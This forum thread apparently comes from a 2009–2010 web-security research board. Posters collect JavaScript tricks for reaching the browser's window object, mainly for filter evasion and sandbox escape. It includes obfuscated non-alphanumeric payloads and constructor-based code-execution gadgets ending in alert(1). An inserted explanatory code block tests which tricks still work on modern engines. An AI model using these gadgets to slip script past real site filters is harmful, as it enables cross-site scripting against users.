Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Tricks for getting a reference to window (rev 16)
Posted by: sirdarckcat
Date: June 08, 2009 12:46AM

/*
* I will be updating this thread when I have time with the replies.. any mods feel free to help.
*/

// all browsers
window;
frames;
self;
top;
parent;
this;
open().opener;
open("","_self")
Date.constructor('return this')()
document.documentElement.ownerDocument.defaultView
x=''.split,x(null)
__proto__.__parent__
(function(){}).__proto__.__parent__
(function(){ return arguments.callee.constructor.__parent__; })()
(function(){ return arguments.callee.caller.arguments.callee.caller.arguments[0].view })();
var win = null;var forEach = [].forEach;forEach(function(val, prop,thisp) {win = thisp;}, []);win

// ff only
[].constructor.constructor.__parent__; // Function.__parent__
content;
_content;
__parent__;
document.defaultView;
([]=[].sort)();
([],[].concat)()[+[]];
([]=[].reverse)();
([],[].slice)()[0];
([],[].filter)(function(x){x==window}); // this also works with sort
([],[].forEach)(function(x){x==window}); // change forEach with: every, map, some
constructor.prototype.__lookupGetter__("window")()
#0=[top][0]
#0={_:top}._

//firefox only [other windows]
window.constructor.prototype.__lookupGetter__("opener")();//gets a reference to opener even if set to null

// FF, O9.5+, Chrome2, SF4 - not IE8 though
(0,[].valueOf)()
(0,Date.valueOf)()
(0,{}.valueOf)()
('',/\//.valueOf)()
('',RegExp.valueOf)()
('',crypto.valueOf)()
(0||Boolean.valueOf)()
(1&&isNaN.valueOf)()
(1?atob.valueOf:0)()

// Works on IE (is intended behaviour)
x={}.valueOf,x()
document.body.setExpression(1,'x=window')
document.parentWindow

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 16 time(s). Last edit at 07/09/2009 03:34AM by sirdarckcat.

Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 04:17AM

FF, O9.5+, Chrome2, SF4 - not IE8 though

(0,[].valueOf)()
(0,Date.valueOf)()
(0,{}.valueOf)()
('',/\//.valueOf)()
('',RegExp.valueOf)()
('',crypto.valueOf)()
(0||Boolean.valueOf)()
(1&&isNaN.valueOf)()
(1?atob.valueOf:0)()

There's a plethora of possibilities to work with valueOf() - as the examples show almost each and any JS/DOM property can be used before .valueOf();



Edited 1 time(s). Last edit at 06/08/2009 05:05PM by .mario.

Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 08, 2009 07:46AM

// Works on IE (is intended behaviour)
x={}.valueOf,x()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 11:07AM

Little bit lame and IE only:

document.body.setExpression(1,'x=window')



Edited 1 time(s). Last edit at 06/08/2009 05:04PM by .mario.

Re: Tricks for getting a reference to window
Posted by: Anonymous User
Date: June 08, 2009 05:04PM

Date.constructor('return this')()

Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 08, 2009 05:41PM

document.documentElement.ownerDocument.defaultView
x=''.split,x(null)
__proto__.__parent__
(function(){}).__proto__.__parent__
(function(){ return arguments.callee.constructor.__parent__; })()
(function(){ return arguments.callee.caller.arguments.callee.caller.arguments[0].view })();
var win = null;var forEach = [].forEach;forEach(function(val, prop,thisp) {win = thisp;}, []);win

A lot of these were from:-
http://stuff.mit.edu/iap/2008/facebook/

and either me or ma1

Re: Tricks for getting a reference to window
Posted by: Gareth Heyes
Date: June 22, 2009 07:44AM

valueOf generally returns the window:-

(1,/a/.valueOf)().alert(1)
(1,/a/.valueOf)(null).alert(1)
(1,/a/.toString.valueOf)().alert(1)
(1,/a/.toString.valueOf)(null).alert(1)
(1,/a/.toString.valueOf)().constructor.constructor.constructor('alert(1)')()

Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 24, 2009 07:25PM

is it possible to get a reference to window without using ascii chars AND without using parenthesis?

Re: Tricks for getting a reference to window (rev 13)
Posted by: sirdarckcat
Date: June 24, 2009 09:56PM

ASCII? \0x00 - \0x7F ?
hahaha no way, you need at least {} or [] or something like that..

Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 25, 2009 01:25AM

i meant to say, non-alphanumeric and without parenthesis

Re: Tricks for getting a reference to window (rev 13)
Posted by: Anonymous User
Date: June 25, 2009 04:53AM

You mean like []['__parent__']? All characters can be retrieved - although the p is no fun (constructor, RegExp..) - my first approach for the shortest alnum was using this way but failed miserably in size :)

Re: Tricks for getting a reference to window (rev 13)
Posted by: thornmaker
Date: June 25, 2009 11:46AM

@.mario yeah, that's what I'm looking for! thanks

Re: Tricks for getting a reference to window (rev 13)
Posted by: Anonymous User
Date: June 26, 2009 02:35AM

Here's a no-alnum no-parenthesis reference to window - quite nasty but almost twitterable :)

[ö='__'][õ=/^/[Ô=[Ó=![Ò={}+ö]+Ò][Õ=!!Ò+ö]+Ò,Ò[Ø=-~[Ö=-~Ò],ø=Ø*Ø+Ö]+Ò[Ö]+Ô[Ö]+Ó[ò=Ö+Ø]+Õ[ó=-!Ö]+Õ[Ö]+Ô[ó]+Ò[ø]+Õ[ó]+Ò[Ö]+Õ[Ö]]+ö,ö+õ[ø*ò-Ö]+Ó[Ö]+Õ[Ö]+Õ[ò]+Ô[Ö]+Õ[ó]+ö]
166

Re: Tricks for getting a reference to window (rev 13)
Posted by: holiman
Date: June 26, 2009 05:04AM

Wow, that's nasty. Did you choose variable names as a means of obfuscation? :)

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: August 24, 2009 04:56AM

constructor == window :)

Actually not window but:-
constructor.constructor.constructor("alert(1)")()

Actually yeah window :)
constructor.prototype.__lookupGetter__("top")()

Edited 2 time(s). Last edit at 08/24/2009 05:03AM by Gareth Heyes.

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: September 02, 2009 07:19AM

(1,/heh/(/heh/).sort)()

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: December 29, 2009 02:54PM

2,000,001 way to get window:-

01.__parent__

Why is that anything? Because try:-
1.__parent__

It doesn't work :)

forcing octal numbers allows us to use numbers with () and get properties

Re: Tricks for getting a reference to window (rev 16)
Posted by: sirdarckcat
Date: December 30, 2009 10:00PM

well for decimals you can do 1..__parent__ but I see your point heh :) cool!

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: January 05, 2010 10:47AM

hehe IE only, no idea what RuntimeObject does though

RuntimeObject().alert(/I rock/)

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: January 19, 2010 05:34AM

(1,Object(Array.prototype).sort)()

Re: Tricks for getting a reference to window (rev 16)
Posted by: SW
Date: February 09, 2010 05:23AM

A lot of that list above doesn't seem to work any more.

On a similar line as those sort() ones, since I am still failing to understand why it works...

FF only:
[].sort().call()
[]["sort"].apply()

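On the question above of why the `sort()`-style calls work, an added example (not part of any post in this thread; `probe`, `survey`, `thisOfDetachedCall` and `THREAD_SNIPPETS` are names made up here): under ES3 a function called without a receiver got the global object as `this`, and built-ins such as `sort`, `concat` and `valueOf` hand that `this` back, whereas ES5 engines pass `undefined` to built-ins and strict functions. The code evaluates the thread's non-DOM snippets on a current engine to show which path is closed and which remains.

```javascript
// Added example (not from the thread). Each expression below is copied from
// the posts above and evaluated in a sloppy-mode function, the mode the
// thread's snippets assume. DOM-dependent ones are left out so this runs in
// any ES5+ engine (Node or a browser console).
const GLOBAL = globalThis;

// Classify what an expression yields: the global object, a TypeError,
// another exception, or some other value.
function probe(expr) {
  try {
    // Function() bodies are sloppy-mode even when the caller is strict.
    const value = Function('return (' + expr + ');')();
    return value === GLOBAL ? 'global' : 'other';
  } catch (e) {
    return e && e.name === 'TypeError' ? 'TypeError' : 'error';
  }
}

// Same function body, sloppy vs. strict: only the sloppy call substitutes
// the global object for an undefined `this`.
function thisOfDetachedCall(strict) {
  const f = Function((strict ? '"use strict";' : '') + 'return this;');
  return (0, f)(); // comma operator drops the receiver, as in the posts
}

const THREAD_SNIPPETS = [
  "Date.constructor('return this')()", // Function constructor: sloppy body
  '(0,[].valueOf)()',                  // built-ins no longer coerce `this`
  '(0,{}.valueOf)()',
  '(1,Object(Array.prototype).sort)()',
  '([],[].concat)()[+[]]',
  '([],[].slice)()[0]',
];

// Map each snippet to its classification on the engine running this file.
function survey() {
  const out = {};
  for (const s of THREAD_SNIPPETS) out[s] = probe(s);
  return out;
}

console.log(survey());
console.log('sloppy call yields global:', thisOfDetachedCall(false) === GLOBAL,
            '| strict call yields undefined:', thisOfDetachedCall(true) === undefined);
```

On an ES5+ engine only the `Function`-constructor snippet still reaches the global object, so a sandbox or filter has to deny access to `constructor`/`Function` rather than just the identifier `window`.
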
Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: May 27, 2010 08:43AM

https://groups.google.com/group/google-caja-discuss/browse_thread/thread/903bb21887ed092e (Via Caja)

<canvas id=c></canvas>
<script>
alert(document.getElementById('c').getContext('2d').canvas.offsetParent.__parent__.__parent__);
</script>

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 13, 2010 07:22AM

Yeah WTF IE:-
document.Script

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 15, 2010 12:25PM

//sooooooooo sweeeeeeeeeeet
<></>.function::__parent__

//All these can be called ;)
__count__,__defineGetter__,__lookupGetter__,__lookupSetter__,__parent__,__proto__,anchor,appendChild,attribute,attributes,big,blink,bold,charAt,charCodeAt,children,concat,constructor,contains,elements,fixed,fontcolor,fontsize,hasOwnProperty,indexOf,isPrototypeOf,italics,lastIndexOf,length,link,localName,localeCompare,match,name,namespace,normalize,parent,propertyIsEnumerable,quote,repeat,replace,reverse,search,slice,small,split,strike,sub,substr,substring,sup,text,toJSON,toLocaleLowerCase,toLocaleString,toLocaleUpperCase,toLowerCase,toSource,toString,toUpperCase,trim,trimLeft,trimRight,unwatch,valueOf,watch

//oh yeah
''.function::__parent__;
[].function::__parent__;
1..function::__parent__;

Edited 2 time(s). Last edit at 07/15/2010 01:13PM by Gareth Heyes.

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 16, 2010 05:23AM

function:: is the new window!!!!!!!!!!!!!!!!!!!!


function::['alert'](1)

//by me and mario :D

Re: Tricks for getting a reference to window (rev 16)
Posted by: Anonymous User
Date: July 20, 2010 07:49AM

Amazing stuff that is...

<?ø?>.\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e::\u005f\u005f\u0070\u0061\u0072\u0065\u006e\u0074\u005f\u005f

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 20, 2010 08:00AM

It's almost as good as FF2

<?ø?>.\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e::['\137\137\160\141\162\145\156\164\137\137']

Re: Tricks for getting a reference to window (rev 16)
Posted by: theharmonyguy
Date: July 23, 2010 08:15AM

I was playing around with some of the tricks on this list and came across two issues...

First, some of the ones under "all browsers" use __proto__ and __parent__. But wouldn't those exclude IE (and Opera)? Also, __proto__.__parent__ is undefined in Chrome.

Second, we should perhaps distinguish between getting a window object and getting the window object of the current document. For instance, x=''.split,x(null) returns a window object, but x(null).location is undefined and x(null).eval() doesn't seem to work.

I bring this up because I was trying to create some cross-browser non-alnum code and I couldn't seem to get a useful window object...



Edited 1 time(s). Last edit at 07/23/2010 08:26AM by theharmonyguy.

Re: Tricks for getting a reference to window (rev 16)
Posted by: Gareth Heyes
Date: July 23, 2010 09:07AM

@theharmonyguy

Yeah there are some uncorrected mistakes but fixing them is boring maybe we'll get round to it

Re: Tricks for getting a reference to window (rev 16)
Posted by: LeverOne
Date: July 23, 2010 09:27AM

@theharmonyguy

x=''.split
alert(typeof x()[0])

----------------------
~Veritas~
